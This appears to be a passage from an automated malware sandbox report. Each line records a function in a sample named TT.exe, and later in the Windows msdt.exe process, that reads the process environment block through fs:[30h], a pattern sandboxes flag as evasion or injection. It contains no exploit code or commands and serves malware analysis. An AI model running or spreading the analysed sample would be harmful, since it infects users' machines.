          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A803E2 mov eax, dword ptr fs:[00000030h]1_2_00A803E2
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A803E2 mov eax, dword ptr fs:[00000030h]1_2_00A803E2
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A803E2 mov eax, dword ptr fs:[00000030h]1_2_00A803E2
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A803E2 mov eax, dword ptr fs:[00000030h]1_2_00A803E2
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A803E2 mov eax, dword ptr fs:[00000030h]1_2_00A803E2
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A7DBE9 mov eax, dword ptr fs:[00000030h]1_2_00A7DBE9
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD53CA mov eax, dword ptr fs:[00000030h]1_2_00AD53CA
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD53CA mov eax, dword ptr fs:[00000030h]1_2_00AD53CA
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B1131B mov eax, dword ptr fs:[00000030h]1_2_00B1131B
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A5DB60 mov ecx, dword ptr fs:[00000030h]1_2_00A5DB60
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A83B7A mov eax, dword ptr fs:[00000030h]1_2_00A83B7A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A83B7A mov eax, dword ptr fs:[00000030h]1_2_00A83B7A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A5DB40 mov eax, dword ptr fs:[00000030h]1_2_00A5DB40
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B28B58 mov eax, dword ptr fs:[00000030h]1_2_00B28B58
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A5F358 mov eax, dword ptr fs:[00000030h]1_2_00A5F358
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A6849B mov eax, dword ptr fs:[00000030h]1_2_00A6849B
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B114FB mov eax, dword ptr fs:[00000030h]1_2_00B114FB
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AD6CF0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AD6CF0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AD6CF0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B28CD6 mov eax, dword ptr fs:[00000030h]1_2_00B28CD6
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8BC2C mov eax, dword ptr fs:[00000030h]1_2_00A8BC2C
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD6C0A mov eax, dword ptr fs:[00000030h]1_2_00AD6C0A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD6C0A mov eax, dword ptr fs:[00000030h]1_2_00AD6C0A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD6C0A mov eax, dword ptr fs:[00000030h]1_2_00AD6C0A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD6C0A mov eax, dword ptr fs:[00000030h]1_2_00AD6C0A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B11C06 mov eax, dword ptr fs:[00000030h]1_2_00B11C06
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B11C06 mov eax, dword ptr fs:[00000030h]1_2_00B11C06
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B11C06 mov eax, dword ptr fs:[00000030h]1_2_00B11C06
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B11C06 mov eax, dword ptr fs:[00000030h]1_2_00B11C06
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B11C06 mov eax, dword ptr fs:[00000030h]1_2_00B11C06
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B11C06 mov eax, dword ptr fs:[00000030h]1_2_00B11C06
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B11C06 mov eax, dword ptr fs:[00000030h]1_2_00B11C06
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B11C06 mov eax, dword ptr fs:[00000030h]1_2_00B11C06
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B11C06 mov eax, dword ptr fs:[00000030h]1_2_00B11C06
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B11C06 mov eax, dword ptr fs:[00000030h]1_2_00B11C06
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B11C06 mov eax, dword ptr fs:[00000030h]1_2_00B11C06
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B11C06 mov eax, dword ptr fs:[00000030h]1_2_00B11C06
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B11C06 mov eax, dword ptr fs:[00000030h]1_2_00B11C06
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B11C06 mov eax, dword ptr fs:[00000030h]1_2_00B11C06
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B2740D mov eax, dword ptr fs:[00000030h]1_2_00B2740D
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B2740D mov eax, dword ptr fs:[00000030h]1_2_00B2740D
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B2740D mov eax, dword ptr fs:[00000030h]1_2_00B2740D
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A7746D mov eax, dword ptr fs:[00000030h]1_2_00A7746D
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8A44B mov eax, dword ptr fs:[00000030h]1_2_00A8A44B
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AEC450 mov eax, dword ptr fs:[00000030h]1_2_00AEC450
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AEC450 mov eax, dword ptr fs:[00000030h]1_2_00AEC450
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A835A1 mov eax, dword ptr fs:[00000030h]1_2_00A835A1
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A81DB5 mov eax, dword ptr fs:[00000030h]1_2_00A81DB5
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A81DB5 mov eax, dword ptr fs:[00000030h]1_2_00A81DB5
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A81DB5 mov eax, dword ptr fs:[00000030h]1_2_00A81DB5
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B205AC mov eax, dword ptr fs:[00000030h]1_2_00B205AC
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B205AC mov eax, dword ptr fs:[00000030h]1_2_00B205AC
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A82581 mov eax, dword ptr fs:[00000030h]1_2_00A82581
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A82581 mov eax, dword ptr fs:[00000030h]1_2_00A82581
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A82581 mov eax, dword ptr fs:[00000030h]1_2_00A82581
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A82581 mov eax, dword ptr fs:[00000030h]1_2_00A82581
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A52D8A mov eax, dword ptr fs:[00000030h]1_2_00A52D8A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A52D8A mov eax, dword ptr fs:[00000030h]1_2_00A52D8A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A52D8A mov eax, dword ptr fs:[00000030h]1_2_00A52D8A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A52D8A mov eax, dword ptr fs:[00000030h]1_2_00A52D8A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A52D8A mov eax, dword ptr fs:[00000030h]1_2_00A52D8A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8FD9B mov eax, dword ptr fs:[00000030h]1_2_00A8FD9B
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8FD9B mov eax, dword ptr fs:[00000030h]1_2_00A8FD9B
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B08DF1 mov eax, dword ptr fs:[00000030h]1_2_00B08DF1
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A6D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A6D5E0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A6D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A6D5E0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B1FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B1FDE2
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B1FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B1FDE2
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B1FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B1FDE2
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B1FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B1FDE2
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AD6DC9
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AD6DC9
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AD6DC9
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD6DC9 mov ecx, dword ptr fs:[00000030h]1_2_00AD6DC9
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AD6DC9
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AD6DC9
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B28D34 mov eax, dword ptr fs:[00000030h]1_2_00B28D34
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B1E539 mov eax, dword ptr fs:[00000030h]1_2_00B1E539
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A63D34 mov eax, dword ptr fs:[00000030h]1_2_00A63D34
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A63D34 mov eax, dword ptr fs:[00000030h]1_2_00A63D34
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A63D34 mov eax, dword ptr fs:[00000030h]1_2_00A63D34
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A63D34 mov eax, dword ptr fs:[00000030h]1_2_00A63D34
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A63D34 mov eax, dword ptr fs:[00000030h]1_2_00A63D34
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A63D34 mov eax, dword ptr fs:[00000030h]1_2_00A63D34
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A63D34 mov eax, dword ptr fs:[00000030h]1_2_00A63D34
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A63D34 mov eax, dword ptr fs:[00000030h]1_2_00A63D34
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A63D34 mov eax, dword ptr fs:[00000030h]1_2_00A63D34
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A63D34 mov eax, dword ptr fs:[00000030h]1_2_00A63D34
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A63D34 mov eax, dword ptr fs:[00000030h]1_2_00A63D34
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A63D34 mov eax, dword ptr fs:[00000030h]1_2_00A63D34
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A63D34 mov eax, dword ptr fs:[00000030h]1_2_00A63D34
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A84D3B mov eax, dword ptr fs:[00000030h]1_2_00A84D3B
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A84D3B mov eax, dword ptr fs:[00000030h]1_2_00A84D3B
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A84D3B mov eax, dword ptr fs:[00000030h]1_2_00A84D3B
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A5AD30 mov eax, dword ptr fs:[00000030h]1_2_00A5AD30
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00ADA537 mov eax, dword ptr fs:[00000030h]1_2_00ADA537
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A7C577 mov eax, dword ptr fs:[00000030h]1_2_00A7C577
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A7C577 mov eax, dword ptr fs:[00000030h]1_2_00A7C577
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A93D43 mov eax, dword ptr fs:[00000030h]1_2_00A93D43
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD3540 mov eax, dword ptr fs:[00000030h]1_2_00AD3540
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A77D50 mov eax, dword ptr fs:[00000030h]1_2_00A77D50
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD46A7 mov eax, dword ptr fs:[00000030h]1_2_00AD46A7
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B20EA5 mov eax, dword ptr fs:[00000030h]1_2_00B20EA5
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B20EA5 mov eax, dword ptr fs:[00000030h]1_2_00B20EA5
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B20EA5 mov eax, dword ptr fs:[00000030h]1_2_00B20EA5
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AEFE87 mov eax, dword ptr fs:[00000030h]1_2_00AEFE87
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A676E2 mov eax, dword ptr fs:[00000030h]1_2_00A676E2
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A816E0 mov ecx, dword ptr fs:[00000030h]1_2_00A816E0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B28ED6 mov eax, dword ptr fs:[00000030h]1_2_00B28ED6
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A836CC mov eax, dword ptr fs:[00000030h]1_2_00A836CC
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A98EC7 mov eax, dword ptr fs:[00000030h]1_2_00A98EC7
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B0FEC0 mov eax, dword ptr fs:[00000030h]1_2_00B0FEC0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A5E620 mov eax, dword ptr fs:[00000030h]1_2_00A5E620
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B0FE3F mov eax, dword ptr fs:[00000030h]1_2_00B0FE3F
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A5C600 mov eax, dword ptr fs:[00000030h]1_2_00A5C600
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A5C600 mov eax, dword ptr fs:[00000030h]1_2_00A5C600
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A5C600 mov eax, dword ptr fs:[00000030h]1_2_00A5C600
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A88E00 mov eax, dword ptr fs:[00000030h]1_2_00A88E00
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8A61C mov eax, dword ptr fs:[00000030h]1_2_00A8A61C
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8A61C mov eax, dword ptr fs:[00000030h]1_2_00A8A61C
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B11608 mov eax, dword ptr fs:[00000030h]1_2_00B11608
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A6766D mov eax, dword ptr fs:[00000030h]1_2_00A6766D
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A7AE73 mov eax, dword ptr fs:[00000030h]1_2_00A7AE73
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A7AE73 mov eax, dword ptr fs:[00000030h]1_2_00A7AE73
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A7AE73 mov eax, dword ptr fs:[00000030h]1_2_00A7AE73
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A7AE73 mov eax, dword ptr fs:[00000030h]1_2_00A7AE73
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A7AE73 mov eax, dword ptr fs:[00000030h]1_2_00A7AE73
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A67E41 mov eax, dword ptr fs:[00000030h]1_2_00A67E41
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A67E41 mov eax, dword ptr fs:[00000030h]1_2_00A67E41
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A67E41 mov eax, dword ptr fs:[00000030h]1_2_00A67E41
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A67E41 mov eax, dword ptr fs:[00000030h]1_2_00A67E41
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A67E41 mov eax, dword ptr fs:[00000030h]1_2_00A67E41
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A67E41 mov eax, dword ptr fs:[00000030h]1_2_00A67E41
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B1AE44 mov eax, dword ptr fs:[00000030h]1_2_00B1AE44
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B1AE44 mov eax, dword ptr fs:[00000030h]1_2_00B1AE44
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A68794 mov eax, dword ptr fs:[00000030h]1_2_00A68794
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD7794 mov eax, dword ptr fs:[00000030h]1_2_00AD7794
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD7794 mov eax, dword ptr fs:[00000030h]1_2_00AD7794
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD7794 mov eax, dword ptr fs:[00000030h]1_2_00AD7794
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A937F5 mov eax, dword ptr fs:[00000030h]1_2_00A937F5
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A54F2E mov eax, dword ptr fs:[00000030h]1_2_00A54F2E
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A54F2E mov eax, dword ptr fs:[00000030h]1_2_00A54F2E
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8E730 mov eax, dword ptr fs:[00000030h]1_2_00A8E730
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8A70E mov eax, dword ptr fs:[00000030h]1_2_00A8A70E
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8A70E mov eax, dword ptr fs:[00000030h]1_2_00A8A70E
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A7F716 mov eax, dword ptr fs:[00000030h]1_2_00A7F716
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AEFF10 mov eax, dword ptr fs:[00000030h]1_2_00AEFF10
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AEFF10 mov eax, dword ptr fs:[00000030h]1_2_00AEFF10
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B2070D mov eax, dword ptr fs:[00000030h]1_2_00B2070D
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B2070D mov eax, dword ptr fs:[00000030h]1_2_00B2070D
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A6FF60 mov eax, dword ptr fs:[00000030h]1_2_00A6FF60
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B28F6A mov eax, dword ptr fs:[00000030h]1_2_00B28F6A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A6EF40 mov eax, dword ptr fs:[00000030h]1_2_00A6EF40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D9B8D0 mov eax, dword ptr fs:[00000030h]7_2_04D9B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D9B8D0 mov ecx, dword ptr fs:[00000030h]7_2_04D9B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D9B8D0 mov eax, dword ptr fs:[00000030h]7_2_04D9B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D9B8D0 mov eax, dword ptr fs:[00000030h]7_2_04D9B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D9B8D0 mov eax, dword ptr fs:[00000030h]7_2_04D9B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D9B8D0 mov eax, dword ptr fs:[00000030h]7_2_04D9B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD8CD6 mov eax, dword ptr fs:[00000030h]7_2_04DD8CD6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DC14FB mov eax, dword ptr fs:[00000030h]7_2_04DC14FB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D86CF0 mov eax, dword ptr fs:[00000030h]7_2_04D86CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D86CF0 mov eax, dword ptr fs:[00000030h]7_2_04D86CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D86CF0 mov eax, dword ptr fs:[00000030h]7_2_04D86CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D058EC mov eax, dword ptr fs:[00000030h]7_2_04D058EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D1849B mov eax, dword ptr fs:[00000030h]7_2_04D1849B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D09080 mov eax, dword ptr fs:[00000030h]7_2_04D09080
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D83884 mov eax, dword ptr fs:[00000030h]7_2_04D83884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D83884 mov eax, dword ptr fs:[00000030h]7_2_04D83884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3F0BF mov ecx, dword ptr fs:[00000030h]7_2_04D3F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3F0BF mov eax, dword ptr fs:[00000030h]7_2_04D3F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3F0BF mov eax, dword ptr fs:[00000030h]7_2_04D3F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D320A0 mov eax, dword ptr fs:[00000030h]7_2_04D320A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D320A0 mov eax, dword ptr fs:[00000030h]7_2_04D320A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D320A0 mov eax, dword ptr fs:[00000030h]7_2_04D320A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D320A0 mov eax, dword ptr fs:[00000030h]7_2_04D320A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D320A0 mov eax, dword ptr fs:[00000030h]7_2_04D320A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D320A0 mov eax, dword ptr fs:[00000030h]7_2_04D320A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D490AF mov eax, dword ptr fs:[00000030h]7_2_04D490AF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D20050 mov eax, dword ptr fs:[00000030h]7_2_04D20050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D20050 mov eax, dword ptr fs:[00000030h]7_2_04D20050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D9C450 mov eax, dword ptr fs:[00000030h]7_2_04D9C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D9C450 mov eax, dword ptr fs:[00000030h]7_2_04D9C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3A44B mov eax, dword ptr fs:[00000030h]7_2_04D3A44B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD1074 mov eax, dword ptr fs:[00000030h]7_2_04DD1074
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DC2073 mov eax, dword ptr fs:[00000030h]7_2_04DC2073
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D2746D mov eax, dword ptr fs:[00000030h]7_2_04D2746D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD4015 mov eax, dword ptr fs:[00000030h]7_2_04DD4015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD4015 mov eax, dword ptr fs:[00000030h]7_2_04DD4015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D87016 mov eax, dword ptr fs:[00000030h]7_2_04D87016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D87016 mov eax, dword ptr fs:[00000030h]7_2_04D87016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D87016 mov eax, dword ptr fs:[00000030h]7_2_04D87016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD740D mov eax, dword ptr fs:[00000030h]7_2_04DD740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD740D mov eax, dword ptr fs:[00000030h]7_2_04DD740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD740D mov eax, dword ptr fs:[00000030h]7_2_04DD740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D86C0A mov eax, dword ptr fs:[00000030h]7_2_04D86C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D86C0A mov eax, dword ptr fs:[00000030h]7_2_04D86C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D86C0A mov eax, dword ptr fs:[00000030h]7_2_04D86C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D86C0A mov eax, dword ptr fs:[00000030h]7_2_04D86C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DC1C06 mov eax, dword ptr fs:[00000030h]7_2_04DC1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DC1C06 mov eax, dword ptr fs:[00000030h]7_2_04DC1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DC1C06 mov eax, dword ptr fs:[00000030h]7_2_04DC1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DC1C06 mov eax, dword ptr fs:[00000030h]7_2_04DC1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DC1C06 mov eax, dword ptr fs:[00000030h]7_2_04DC1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DC1C06 mov eax, dword ptr fs:[00000030h]7_2_04DC1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DC1C06 mov eax, dword ptr fs:[00000030h]7_2_04DC1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DC1C06 mov eax, dword ptr fs:[00000030h]7_2_04DC1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DC1C06 mov eax, dword ptr fs:[00000030h]7_2_04DC1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DC1C06 mov eax, dword ptr fs:[00000030h]7_2_04DC1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DC1C06 mov eax, dword ptr fs:[00000030h]7_2_04DC1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DC1C06 mov eax, dword ptr fs:[00000030h]7_2_04DC1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DC1C06 mov eax, dword ptr fs:[00000030h]7_2_04DC1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DC1C06 mov eax, dword ptr fs:[00000030h]7_2_04DC1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D1B02A mov eax, dword ptr fs:[00000030h]7_2_04D1B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D1B02A mov eax, dword ptr fs:[00000030h]7_2_04D1B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D1B02A mov eax, dword ptr fs:[00000030h]7_2_04D1B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D1B02A mov eax, dword ptr fs:[00000030h]7_2_04D1B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3002D mov eax, dword ptr fs:[00000030h]7_2_04D3002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3002D mov eax, dword ptr fs:[00000030h]7_2_04D3002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3002D mov eax, dword ptr fs:[00000030h]7_2_04D3002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3002D mov eax, dword ptr fs:[00000030h]7_2_04D3002D
